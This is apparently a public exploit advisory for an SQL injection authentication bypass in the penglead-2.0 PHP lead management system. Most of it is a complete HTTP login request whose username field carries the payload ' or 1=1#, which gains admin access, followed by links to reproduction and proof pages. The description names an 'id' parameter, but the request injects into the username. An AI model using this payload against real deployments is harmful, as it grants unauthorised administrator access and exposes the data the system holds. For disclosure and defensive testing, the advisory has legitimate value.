Share
## https://sploitus.com/exploit?id=PACKETSTORM:175649
## Title: penglead-2.0 SQLi-Bypass Authentication  
## Author: nu11secur1ty  
## Date: 11/10/2023  
## Vendor: https://www.mayurik.com/  
## Software: https://www.mayurik.com/source-code/P2760/lead-management-system-in-php-free-download  
## Reference: https://portswigger.net/web-security/sql-injection  
  
  
## Description:  
The id parameter is vulnerable to SQLi - Bypass Authentication attacks.  
The attacker can easily get access to the admin account of the system  
then he can do very malicious stuff etc.  
  
STATUS: HIGH-CRITICAL Vulnerability  
  
[+]Exploit:  
```MySQL  
POST /penglead/login.php HTTP/1.1  
Host: 192.168.100.45  
Cookie: PHPSESSID=3qa8cq3da9t9rvr621vov0shsh  
Content-Length: 88  
Cache-Control: max-age=0  
Sec-Ch-Ua: "Chromium";v="119", "Not?A_Brand";v="24"  
Sec-Ch-Ua-Mobile: ?0  
Sec-Ch-Ua-Platform: "Windows"  
Upgrade-Insecure-Requests: 1  
Origin: https://192.168.100.45  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123  
Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: https://192.168.100.45/penglead/login.php  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Priority: u=0, i  
Connection: close  
  
username=nu11secur1ty%27+or+1%3D1%23&password=FSFFGDDGDGFDG&g-recaptcha-response=&login=  
```  
  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/penglead-2.0)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2023/11/penglead-20-sqli-bypass-authentication.html)  
  
## Time spent:  
00:05:00